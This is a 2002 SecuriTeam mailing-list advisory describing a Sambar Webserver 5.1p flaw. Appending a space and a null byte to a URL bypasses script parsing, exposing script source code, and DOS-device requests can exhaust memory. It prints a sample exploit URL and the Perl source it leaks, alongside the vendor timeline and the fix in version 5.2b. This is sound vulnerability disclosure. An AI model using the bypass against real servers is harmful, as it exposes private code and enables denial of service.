[NT] Sambar Webserver Serverside Fileparse Bypass
From: support@securiteam.comDate: 04/17/02
- Previous message: support@securiteam.com: "[UNIX] FileSeek CGI Script Command Execution and Arbitrary File Viewing Vulnerabilities"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: Wed, 17 Apr 2002 15:12:02 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
Sambar Webserver Serverside Fileparse Bypass
------------------------------------------------------------------------
SUMMARY
A flaw in the serverside URL parsing could allow a malicious user to
bypass serverside fileparsing and display the source code of scripts. The
same flaw could allow a malicious user to crash the web service.
DETAILS
Vulnerable systems:
- Sambar Webserver version 5.1p on Windows 2000
- Other versions were not tested.
Immune systems:
- Sambar Webserver version 5.2b on Windows 2000
It is possible to bypass the serverside parsing of scripts, such as .pl,
jsp, .asp, .stm and download the source code. The bypassing also opens up
for a request to certain DOS-devices that the server would then attempt to
access. These resources used in such requests are not freed properly and
as a result, the web server will eventually run out of memory and the
operating system will kill the web service.
To bypass the serverside parsing, an attacker would have to access the
resource with a suffix of <space><null>. There are many ways to achieve
this in e.g. Internet Explorer, and an example of source code exposure
could be:
http://server/cgi-bin/environ.pl+%00
Which would return the following (perl sourcecode):
read(STDIN, $CONTENT, $ENV{'CONTENT_LENGTH'});
print< GATEWAY_INTERFACE: $ENV{'GATEWAY_INTERFACE'}
PATH_INFO: $ENV{'PATH_INFO'}
PATH_TRANSLATED: $ENV{'PATH_TRANSLATED'}
QUERY_STRING: $ENV{'QUERY_STRING'}
REMOTE_ADDR: $ENV{'REMOTE_ADDR'}
REMOTE_HOST: $ENV{'REMOTE_HOST'}
REMOTE_USER: $ENV{'REMOTE_USER'}
REQUEST_METHOD: $ENV{'REQUEST_METHOD'}
DOCUMENT_NAME: $ENV{'DOCUMENT_NAME'}
DOCUMENT_URI: $ENV{'DOCUMENT_URI'}
SCRIPT_NAME: $ENV{'SCRIPT_NAME'}
SCRIPT_FILENAME: $ENV{'SCRIPT_FILENAME'}
SERVER_NAME: $ENV{'SERVER_NAME'}
SERVER_PORT: $ENV{'SERVER_PORT'}
SERVER_PROTOCOL: $ENV{'SERVER_PROTOCOL'}
SERVER_SOFTWARE: $ENV{'SERVER_SOFTWARE'}
CONTENT_LENGTH: $ENV{'CONTENT_LENGTH'}
CONTENT: $CONTENT
END
Vendor response:
The vendor was contacted 3rd of April, 2002. The vendor confirmed the bug
on the same day, and notified us that a patch was being developed. On the
17th of April, the vendor released a new version that corrects the issues.
Corrective action:
The vendor has released Version 5.2b, which is available here:
<http://sambar.dnsaloas.org/win32-preview.tar.gz>
http://sambar.dnsaloas.org/win32-preview.tar.gz
ADDITIONAL INFORMATION
The information has been provided by <mailto:pgrundl@kpmg.dk> Peter
Gründl.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[UNIX] FileSeek CGI Script Command Execution and Arbitrary File Viewing Vulnerabilities"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
